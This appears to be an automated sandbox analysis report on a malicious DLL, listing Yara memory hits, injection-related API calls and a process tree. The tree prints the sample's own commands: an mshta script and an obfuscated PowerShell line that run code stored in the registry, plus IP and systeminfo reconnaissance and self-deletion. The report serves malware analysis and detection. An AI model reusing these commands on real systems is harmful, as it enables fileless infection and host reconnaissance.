File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_036D4BF1 |
2_2_036D4BF1 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_036D1645 |
2_2_036D1645 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_036D829C |
2_2_036D829C |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0628FF4D |
2_2_0628FF4D |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0628D7F1 |
2_2_0628D7F1 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_062767CA |
2_2_062767CA |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0628154D |
2_2_0628154D |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_06293DB0 |
2_2_06293DB0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0627B238 |
2_2_0627B238 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0052B4B8 |
24_2_0052B4B8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00529660 |
24_2_00529660 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0052EEF8 |
24_2_0052EEF8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00547850 |
24_2_00547850 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00531864 |
24_2_00531864 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00532830 |
24_2_00532830 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005498A8 |
24_2_005498A8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005480A8 |
24_2_005480A8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0052716C |
24_2_0052716C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00525110 |
24_2_00525110 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0052410C |
24_2_0052410C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0053E120 |
24_2_0053E120 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0053B9E0 |
24_2_0053B9E0 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005451A8 |
24_2_005451A8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00534240 |
24_2_00534240 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00531248 |
24_2_00531248 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0054C220 |
24_2_0054C220 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00542AD8 |
24_2_00542AD8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00548AC0 |
24_2_00548AC0 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005473EC |
24_2_005473EC |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0054AC50 |
24_2_0054AC50 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0053C46C |
24_2_0053C46C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0052D404 |
24_2_0052D404 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00523C3C |
24_2_00523C3C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00542428 |
24_2_00542428 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0054D4D4 |
24_2_0054D4D4 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005234D8 |
24_2_005234D8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005434C0 |
24_2_005434C0 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00536CA4 |
24_2_00536CA4 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00529D1C |
24_2_00529D1C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0053CD1C |
24_2_0053CD1C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00540530 |
24_2_00540530 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00547DB4 |
24_2_00547DB4 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00541E5C |
24_2_00541E5C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00538670 |
24_2_00538670 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00541638 |
24_2_00541638 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0053BED0 |
24_2_0053BED0 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00532EE8 |
24_2_00532EE8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00545684 |
24_2_00545684 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00521EA8 |
24_2_00521EA8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00534F5C |
24_2_00534F5C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00536F78 |
24_2_00536F78 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0054772C |
24_2_0054772C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0052572C |
24_2_0052572C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572393EEF8 |
37_2_000001572393EEF8 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572393B4B8 |
37_2_000001572393B4B8 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572395C220 |
37_2_000001572395C220 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723941248 |
37_2_0000015723941248 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723944240 |
37_2_0000015723944240 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_00000157239551A8 |
37_2_00000157239551A8 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572394B9E0 |
37_2_000001572394B9E0 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572393410C |
37_2_000001572393410C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723935110 |
37_2_0000015723935110 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572394E120 |
37_2_000001572394E120 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_00000157239598A8 |
37_2_00000157239598A8 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_00000157239580A8 |
37_2_00000157239580A8 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723942830 |
37_2_0000015723942830 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723957850 |
37_2_0000015723957850 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723941864 |
37_2_0000015723941864 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723946F78 |
37_2_0000015723946F78 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572395772C |
37_2_000001572395772C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572393572C |
37_2_000001572393572C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723944F5C |
37_2_0000015723944F5C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723955684 |
37_2_0000015723955684 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723931EA8 |
37_2_0000015723931EA8 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572394BED0 |
37_2_000001572394BED0 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723942EE8 |
37_2_0000015723942EE8 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723951638 |
37_2_0000015723951638 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723948670 |
37_2_0000015723948670 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723951E5C |
37_2_0000015723951E5C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723939660 |
37_2_0000015723939660 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723957DB4 |
37_2_0000015723957DB4 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723950530 |
37_2_0000015723950530 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572394CD1C |
37_2_000001572394CD1C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723939D1C |
37_2_0000015723939D1C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723946CA4 |
37_2_0000015723946CA4 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572395D4D4 |
37_2_000001572395D4D4 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_00000157239534C0 |
37_2_00000157239534C0 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_00000157239334D8 |
37_2_00000157239334D8 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572393D404 |
37_2_000001572393D404 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723952428 |
37_2_0000015723952428 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572395AC50 |
37_2_000001572395AC50 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723933C3C |
37_2_0000015723933C3C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572394C46C |
37_2_000001572394C46C |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_00000157239573EC |
37_2_00000157239573EC |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723958AC0 |
37_2_0000015723958AC0 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_0000015723952AD8 |
37_2_0000015723952AD8 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_036D4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
2_2_036D4321 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_036D190C GetProcAddress,NtCreateSection,memset, |
2_2_036D190C |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_036D6D0A NtMapViewOfSection, |
2_2_036D6D0A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_036D84C1 NtQueryVirtualMemory, |
2_2_036D84C1 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0628BE80 NtMapViewOfSection, |
2_2_0628BE80 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_06280782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
2_2_06280782 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0627C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
2_2_0627C431 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_062774AE NtQueryInformationProcess, |
2_2_062774AE |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_06286DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, |
2_2_06286DE0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_06282331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
2_2_06282331 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_06285312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
2_2_06285312 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0628A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
2_2_0628A806 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_062800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
2_2_062800DC |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0627710A GetProcAddress,NtCreateSection,memset, |
2_2_0627710A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_06287950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
2_2_06287950 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_062861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
2_2_062861AE |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_062736BB NtGetContextThread,RtlNtStatusToDosError, |
2_2_062736BB |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0627D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
2_2_0627D77A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0627B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
2_2_0627B7D5 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_062764C4 memset,NtQueryInformationProcess, |
2_2_062764C4 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_06285220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
2_2_06285220 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0628EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
2_2_0628EAC5 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_06283829 NtQuerySystemInformation,RtlNtStatusToDosError, |
2_2_06283829 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_062710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
2_2_062710C7 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0053583C NtCreateSection, |
24_2_0053583C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005240C0 NtReadVirtualMemory, |
24_2_005240C0 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0054A148 NtQueryInformationProcess, |
24_2_0054A148 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0052B11C RtlAllocateHeap,NtQueryInformationProcess, |
24_2_0052B11C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005341D8 NtMapViewOfSection, |
24_2_005341D8 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0052AA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, |
24_2_0052AA6C |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005404CC NtAllocateVirtualMemory, |
24_2_005404CC |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00526D24 NtWriteVirtualMemory, |
24_2_00526D24 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_005265E4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
24_2_005265E4 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_00529660 NtSetContextThread,NtUnmapViewOfSection,NtClose, |
24_2_00529660 |
Source: C:\Windows\System32\control.exe |
Code function: 24_2_0055F002 NtProtectVirtualMemory,NtProtectVirtualMemory, |
24_2_0055F002 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572395A148 NtQueryInformationProcess, |
37_2_000001572395A148 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_00000157239365E4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
37_2_00000157239365E4 |
Source: C:\Windows\System32\rundll32.exe |
Code function: 37_2_000001572396F002 NtProtectVirtualMemory,NtProtectVirtualMemory, |
37_2_000001572396F002 |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP" |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP" |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: C:\Windows\System32\control.exe |
Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP" |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP" |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1" |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1" |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1" |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1" |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\explorer.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: Yara match |
File source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
